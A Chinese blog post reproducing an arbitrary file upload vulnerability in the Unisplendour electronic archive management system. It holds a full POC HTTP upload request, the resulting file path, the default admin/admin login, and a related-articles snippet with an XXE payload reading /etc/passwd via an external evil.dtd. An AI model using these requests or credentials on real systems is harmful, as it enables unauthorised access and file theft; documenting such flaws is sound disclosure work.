首页 > 其他分享 >【漏洞复现】紫光电子档案管理系统任意文件上传漏洞

【漏洞复现】紫光电子档案管理系统任意文件上传漏洞

时间:2023-09-18 22:44:35浏览次数:37  
标签:form WebKitFormBoundary3enKbCUwg60aGZcr 紫光 Content 漏洞 复现 ------ data

1、简介

紫光电子档案管理系统是由紫光软件系统有限公司自主研发的通用档案管理系统,依照国家档案管理标准开发,结合先进的信息化管理理念,采用纯BS结构,使用流行的互联网云计算的技术框架,并且通过UE优化设计,符合用户的使用习惯,是一套具有先进性、安全性、前瞻性的综合档案管理平台。

2、漏洞描述

任意文件上传漏洞

3、受影响版本

4、FOFA语

5、漏洞复现

POC

POST /System/Cms/upload.html?token= HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 544
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr

------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="userID"

admin
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="fondsid"

1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="comid"

1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="token"

1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="files[]"; filename="11.txt"

12345ewq
------WebKitFormBoundary3enKbCUwg60aGZcr--

拼接/uploads/company1/fonds1/cms/20230918/UNIS-eDjVUWST4Tqf5vLr9GwmG1foK.txt,经过测试需要登录成功才可以访问,默认账号密码admin/admin

6、整改建议

标签:form,WebKitFormBoundary3enKbCUwg60aGZcr,紫光,Content,漏洞,复现,------,data
From: https://www.cnblogs.com/fuchangjiang/p/17713330.html

相关文章

  • 【漏洞复现】JumpServer未授权访问漏洞(CVE-2023-42442)
    1、简介JumpServer是一款符合4A规范的开源堡垒机,帮助企业以更安全的方式管控和登录各种类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。2、漏洞描述JumpServer在3.0.0-3.6.3版本存在未授权访问漏洞。由于系统权限配置存在不合理,导致未授权攻击者可以直接访问......
  • WEB漏洞-XXE&XML之利用检测绕过全解
    XML内容: <?xmlversion="1.0"?> <!DOCTYPEa[ <!ENTITY%dSYSTEM“file:///etc/passwd”>%d; ]> <c>%d;</c> XML内容 <?xmlversion=’1.0’?> <!DOCTYPEa[ <!ENTITY%dSYSTEM“http://abc.com/evil.dt......
  • 基于Linux+宝塔面板+LNMP+Wordpress搭建的网站主页的网站漏洞修补的解决方案 (1)
    基于Linux+宝塔面板+LNMP+Wordpress搭建的网站主页1.网站漏洞修补的解决方案@目录基于Linux+宝塔面板+LNMP+Wordpress搭建的网站主页前言为什么要做网站漏洞扫描降低资产所面临的风险满足法律合规要求满足业界安全最佳实践及认证需求其他参考信息等级保护网络安全法安全建议漏......
  • 业务逻辑漏洞_支付逻辑
    ❤️支付问题的思路❤️......
  • 变量覆盖漏洞
    来自:[BJDCTF2020]Marklovescat开始打开就是一个js/css页面,源码看不到东西,没有其他入口,像这种题,基本上是源码泄露。dirsearch一扫发现一堆/.git,应该就是git源码泄露,我们直接githack下载:(注,此处我开始下不下来,搜了下问题应该在于扫的太快了导致给我拒了,把里面一个self.thread_c......
  • .NET MVC 安全漏洞系列
    一、XSS漏洞定义XSS攻击全称跨站脚本攻击,它允许恶意web用户将代码(如:html代码)植入到页面上,当访问到该页面时,嵌入到页面的html代码会自动执行,从而达到恶意攻击的目的。二、解决方案1.新建立一个XSSHelper帮助类publicstaticclassXSSHelper{///<summa......
  • 垂直腔表面发射激光器极化噪声的建模与分析论文复现
    ✅作者简介:热爱科研的Matlab仿真开发者,修心和技术同步精进,matlab项目合作可私信。......
  • XXE漏洞
    来自:[NCTF2019]FakeXMLcookbook在moectf2023中也有一道题知识点是XXE漏洞,只不过那道更明显一点。XXE漏洞全称XMLExternalEntityInjection即XML外部实体注入。XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、......
  • 网络安全-逻辑漏洞
     免责声明:本博客内所有工具/链接请勿用于未授权的违法攻击!!用户滥用造成的一切后果自负!!使用者请务必遵守当地法律!!1、逻辑漏洞:因为代码的逻辑产生了问题所产生的漏洞,A保存提交表单-B审核-C确认,A保存提交表单-C确认。场景:验证码绕过、密码找回、支付漏洞、越权漏洞2、验证码(CAPTCH......
  • jsp 之文件包含漏洞
    一、静态包含被静态包含文件的后缀名可以是txt、png、jpg等,只要文件内容是正常的jsp内容,被包含文件就可以正常加载、编译和执行。<%@pagecontentType="text/html;charset=UTF-8"pageEncoding="UTF-8"%><!DOCTYPEhtml><html><head><metacharset="UTF-8&qu......